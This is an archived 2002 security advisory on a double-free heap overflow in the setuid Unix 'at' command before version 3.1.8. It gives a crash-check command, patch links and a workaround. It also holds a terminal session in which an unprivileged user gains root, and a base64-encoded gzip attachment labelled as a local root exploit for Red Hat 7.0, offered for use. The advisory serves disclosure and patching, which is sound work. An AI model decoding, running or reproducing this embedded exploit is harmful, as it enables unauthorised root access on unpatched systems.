17th Jan 2002 [SBWID-5007]
COMMAND
at heap overflow may lead to root access
SYSTEMS AFFECTED
at before 3.1.8
PROBLEM
Zen-parse reported :
The \'at\' command reads commands from standard input for execution at
a later time specified on the command line. If such an execution time
is given in a carefully drafted (but wrong) format, the at command may
crash as a result of a surplus call to free(). The cause of the crash
is a heap corruption that is exploitable under certain circumstances
since the /usr/bin/at command is installed setuid root.
To check if you are potentially vulnerable to this exploit, execute:
/usr/bin/at 31337 + vuln. If you are vulnerable this will cause:
\"Segmentation fault\"; If not, there will be a message similar to:
\"Garbled time\" (possibly with some extra information). The problem is
caused by a bug in the parser which deallocates the same memory
location twice. This can sometimes be exploited, for the uid of
\"daemon\", and due to some other minor problems, may allow root access
from there.
Attached is an exploit for Redhat 7.0.
bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo \"I was just testing something and you need to fix at or some malicious hacker could be evil.\" |mail -s \"Fix /usr/bin/at\" root
woot-2.04# exit
bash-2.04$
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net,
it may be redistributed without modification. 2) In any other case the
contents of this message is confidential and not to be distributed in
any form without express permission from the author. This document may
contain Unclassified Controlled Nuclear Information.
---1463783680-1867212452-1011226355=:13482
Content-Type: APPLICATION/X-GZIP; NAME=\"attn.tar.gz\"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0201171312350.13482@clarity.local>
Content-Description: Local root exploit (rh 7.0)
Content-Disposition: ATTACHMENT; FILENAME=\"attn.tar.gz\"
H4sIADuuRDwAA+1ae3fbthXP3/wUCOvUUkJLpEQ9XEfJ6dKkydnyWOuenjV2
d0AStDhTJMOHLfWxz77fBUCK8iPZzpqs2wgfSyJwcYH7vhcgL8tkeOfjNtt2
7dlkgm/bnk3dnW/d7tgzd+Q4o8nYmd2xHXsyGt1hk4+8L9mqouQ5Y3fERRS/
D+5D4/+ljZP8iyoKiqWI40GUZL/9GpCnPXXdW+XvTJT88T+dTkaAH4/Gzh1m
//Zbud7+z+W/4lHS6xs/G6wQZS6gCD3bsvtH+vls+1wlcZSc98znr18+HUJt
VtlWb0wCEGvhxz1z6EXQqKVpmZdpWppy8q/Gf5rOrt3cpP3z4IInvgg+jvl/
0P5n9qT2/1N7OiX7p5DQ2f8naN8lfsyLIgojEbAnaVLmaRzj56vKjwUY8yIJ
03zFyyhNDIOp9opf8LiBeJOnWRUXAGA1gG7tuarn20z4EeY+50kAb3LGvhHv
qigXAY2/Sks8A2fBvViwMmXP0lxEZwkWJBw8LgzDcMK5Z8/tuRDcc92xD00Z
Tx38IXbMoDfTYO6PHZv7Nh7wMZt5oTsahXw+nxlTMQtcz7fd8eF0JEbO3JlP
XTHjM9+ZOCN/PhkFnjMX3gggwMBDfzLlvueg+9Dgh5OpPZn4o8CdH9pzZ+x6
7tjxDjlAfccdT2xn5s8moRBTx4e+j8YjHh66Pp8Gh0YQzDzPC3zXG3vzcOLP
PTELuedPp+EU9sEPbSecetxRFmEY/5Jc/g35S/sPoyQYFMvfTKmuNGn/I/s2
+3cdd3Yl/o9suITO/j9B++yujtfGZ+x4GRWs8PMoK5nPE+YJVhXQOVgignzG
LtP8nKVVycqlYH6a58IvGVxBJQqCASyQQC3l+FdPnx3/8PrVUwZTZ9+++EED
DgASlzn3BcNim7TKWZhHAvpHc3Mhen05IwzSTCT0kAuJL0pKkYuiJK8RVolP
ml/o1YBJrLM4jUrCUqQrgT7AxdE5bWmvXvFAnNyVWQo7SNmQMhiovxwZDPMK
fuaHgyfPvzxm0D9M60Uhi0p2Fl2AvlfpXZbl6SorLXyLomA/PpEbLfMN42fI
ogZ9JtcSZ0ibsBQziZxfFCHmznKAo6mFAFmhpI4HASHFQrBpfzkwAPJ6yTaC
LweDQQ0ViJBXcUmpGfGhYEGa7JdSLpbECH6S5HQf7YfEtUwvST5notR04sGr
ojiw5AQer9KiJORRwksRbzCZUED85IiBBPCN7DUychk36MGA1vwSQ9ix3oxc
F3zcLippL6M41nvdAihKgDYBGnRBsFkKLyjjwZKXui9BpLio4kTktEHJrD9U
EIxeNBFQWqmxkVxd6kxu2yVDjOLgsA/tEBJ0yS9AJW1a5rEAsDAzl8rJsUmR
HXibA/oGrqLMK6l3UCwwLA3ZJe0J+w5SKB6QMKfPjqs8wVioubPKKiguW6VJ
VKY56Scb9dnXIJmzLBLQPeDJeCZyi7OY52cCm1qtMIXYBBgBbJjP83Ohpo/7
7Ps8KpVZhAgL6SUR6GJXCRQI26MBifILgpehuGZ1SuOeoAlEX5VFQW3y51EQ
REJKUM+R3AkQsgPlBc5JZqtNIeJwUEO9oYAttCZCZQoebFEcYyOQaRywS5pK
GoWPkhiSxWR3l1G5JK1aCYnQ7bMncVoI5RjERigLn0Dj/TQJCmVxkN45VJPm
Sbg4CtX0SZ+9Jn41s2XvtM/eRP45qzLJGMVdOTLrs+eRQkI01awr04yEIoEF
D+QmW1OhwAV+5gF91+op8c377IVSQbgAuASIPyn8KK0KCKawwH0wcSJBD2tF
UUtq9ZD05eIgp2XRX4i22klyHLvPvksCkSeCY1tSA2nFyzwthYWv65oxUprR
Uga+gpesxV/rhrgA69QsVkSrLL6++K1Cffndk+fvk6wDw/iaqHdhrdWKF+fM
ns2MfMUOQja84Llyj2NnPL6/fS4509+DEq5/OwCGLw0KTScGHO1+YQ1F6Vs0
ZJ3tN51FlqaxRfDDptssrEueJ2DLF2ScK05aVdNBsQHWGiCUEd90ZLS0TM+k
ze4jEuzXYkvEupTMxVQoklSUH59YZr0FOPxBIJJNTcFwuzsMPRq+Sk/u7vbd
Bm4NMYiPFino9PMU1Vv5t9Qr5JhubZDBt0//bBG/VOdDNqyKXFIGxXnUYrXh
L1cpSH+wbgvAEP4yZY925KD6SFZTGtkRCrkIDm5CdKNHw0BcDJMqjrvy//fa
ZP4fUOb0cfP/95z/jifu+Fr+P3a7/P9TtG3+b9RZNaMKM0G0/NlgykFTzvh3
febnIRXC/8BvevIUkScfFGkDrjq2EM05IWFC//a82ddz8jo/pjz+/tD4tbUd
JCW0Fel09hwTz0Gd4Q5M3W/+BQ56xTcq96vzU45EEdkc2y1EKKOQ+8BkTaqh
/LdD624XXnGkXCAdi79lB0FNDjtlv/zCVudBlDdd6KBtmi/5OUUO3W3SKWrA
lCOmc9OvXnxjmft79HPftPbZQ7mRKMngR+WWsCOfHWRRJjSrUKjgh4GNYQs/
gX6svrNFCtEVss2fm7VMtZYll0EseijlpRaRkmstoiSJRVrifQ8iLVm9YS3m
FrqDAnkRJjca0MLcqAk7SFBvBHHkvWelnSsJLLajMs16rd72Uk23oQueVihq
RPW1Lgwojivl1AWIyQyG2DhCaGviFylAdYM+nzboniBnk/i2h+LGTRva1Th7
R9Orgp+1dN3Wivv62bNvnx63dbSZQeGYLBJzfIrnpCAPHz5Nnxlbw5bI9p8s
eXKm6UVaqTJCqNJnsu5r1eumroJNxppBMhs4ZYCjDE9vnLW/N9q/OmV/b7wP
YDK8BEklCCqQE1LiSNWkLklJLwb7hh9IF0Dfe2++/8qAI0jzkh2/fAOjWdRJ
BmWMZA86hdzJAW8ysHrsViKvj0hCtlOHuywYXiFveJMR32zDJBWdZCHH2tsV
JGro9ELkf0U5vdWAg4QORSMfRMr+MEKhMRhA1grLFa8pYQy2urihm3jKSI3v
kr1dHz9ln39OSq4gW30nei96g8q7EsyAVF8OeUjzfSlXKsw1IKPDmF+3yf4U
DmzvM5AkmF2vpp9HV57H6llag3Z7JFDVq/WCOrZaITeuTF05Z+W59ZLiXb3k
1l0ateXste6z5LPD9kZsb2wodPJR4b+FaTuSkxXNrlh+37mvzP90fPhYa3zg
/sexZ1fvf7vz30/Vanf9pxev/nj8mplUSA/jAGF6kOUiTnlgGgYCXM9HZL9f
yJviLEcUCHumPnNlIYdfCr5g94qTxLQKdRcclT1H3vwa2ytmTGNh+2oZ/p9u
nPtW/aO5eK5uG/WXyLt6JlmYvHUOF6E8KTalM5AlPyxvSGUvXUEDJgp7d8M+
0WDqs1F1RpIyCSSRaJJCy5RlLeiQ3T4dRvXC9vX37jLyxGIm1XhyGMpJxWYl
IRVHrX9mQlGKFTC3CnM6FUnSBGyEeoJrjq3+TMUCeP8avz2bzdp8qJe9QnmS
Usg/hwcMxOOrNLdcYJOl3cACKVS7f8S6+/z/mSb9/zat/yhrfOj+n172ueL/
J+6s8/+fov01SmDUyjvDW8DTCuVqDcpCt17velggjwBXlF4mt7wTZOkXh7S/
ug1oOnMoULBfDaRSJZ2J290LQ5+sKftX9cvHWuMD9u+69M7Plfxv0tn/J2nG
cMh6+qbZYkEqCsqQ5AWiuhkPo3Vzp39Ot04x8+L08jF7iRqrUJdGhITFyOjK
aIWqhwXCq87kYUMaMpg6PIA+fMjy1Ff33BzWzmOW0c05+56qR4nFEyxBwUvZ
GV2PN9eF9TZQVfYNgnyZBlG42R5o6PcQokTe/yPPSRK6duUb/e4CXc1gRogS
NikJAWq2Qr5DgD3GkVfQLWsrBXvfycjVc5HmWZap+hzCrM8AaTGH8fysWmFp
xhYLfVsaylMQ8DVfUU7bBzNQ2dJpSQWCMOHirXMqqZbrE55Rg6cgPAUHqbxQ
6GUd3swcqZlffYk9bmlRhPQA4T9ajB7rNb6oSezTAQXMQfpmP4UceSHeni4M
82QtvJO1E56sJ+JkPT88Wc+mJ2vOT9Zj52Tt2+ibn6xd9M1matydmjTN90/W
HoZtT3WHY3wHGBZqOv2eTBWcj99zW04jrIGeEhBmux7GTvAcADwM63/TIKab
VMiaR6hXUJX0qNh4Z0ly7oO9TQGSHclQ9+7uwulnC4fy2hhMyxYkjl5fjWY6
/hEgGNWv323dXoyhuJAfTWaug51EVoNv1QmQ8uMaeF0oUfyjCPxOr1zEQmQ9
l7JtphWEqJCAdVFF5JAoNZX3SZz1b5FcNCT/ZC9s6wIfay8MQ/o/0gMODThq
QNC/Hoj1d8CL6KcFVEiWHUCMPbwdTab2ad2BXb6dSD/edHk39DUapQZOZUVV
RGeJCBTA/exaVywSRCbIU/9aFGWOXz0l6+bIRhVRuppp1rHMe8U9/16BgrSt
zLKmSfNetmi6j7B09uDBVuL3swU4grIKP+o9KMG2xznfjj9wboLw/RbE5CYI
z2tBuI0SkEwXi3Ffsx9kl3CQPW3XdV4lT9Z6dpt6SMcyW4dPO6yBVCxTnk+F
KNXvv//avX2pa1pa83SlCkTaTLQf0azTed6gfp/QtCBrqeV1ibsdaieGrQmu
mgA2QH/f2qcL5IJsJVaFKOX+bUuqj7SKdvf60LbUu5NySMk4Xowe9LTONNLu
P9A9yuH177lH8cNDmnkUP1i4mhTS4PgBrb+e2EdNh0MdYatjJDvCbcf4VBqT
oqHmvCdZ/+Xx8asFlBIqSc/bHQGYXhJKLiQgHsnTH6u3TzJW5vTyCoWGwU2s
UPIvcz/bKAkf/7AYDE0lINaTGtTX0z6nPWryaaVTa3+4bykQjYUr5Io5241p
kat9baPtJb0qRYf5MFl62UOssgjb5XG8sSQ0BTN1NIzI73Ev3lCER/hDlIrT
Ukf3QY15g/hV0Wx9Q7BMqzOkJUXKLpcp83kuiscS1ilKFS0pT6B4H6e+fBmW
EgBQm+YbIL1cRrGoNYB0+OHItfuaTLKVzy8k++RdnuyoT1PUKZNWexlOpJ9V
HV1x0rWuda1rXeta17rWta51rWtd61rXuta1rnWta13rWte61rXfa/sHxMOv
vABQAAA=
---1463783680-1867212452-1011226355=:13482--
SOLUTION
A temporary workaround against the bug is to disable the at command for
non-root users by removing the setuid-bit from the /usr/bin/at command.
Patches are available from the various integrators.
http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.dsc
http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.diff.gz
http://security.debian.org/dists/stable/updates/main/source/at_3.1.8.orig.tar.gz
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
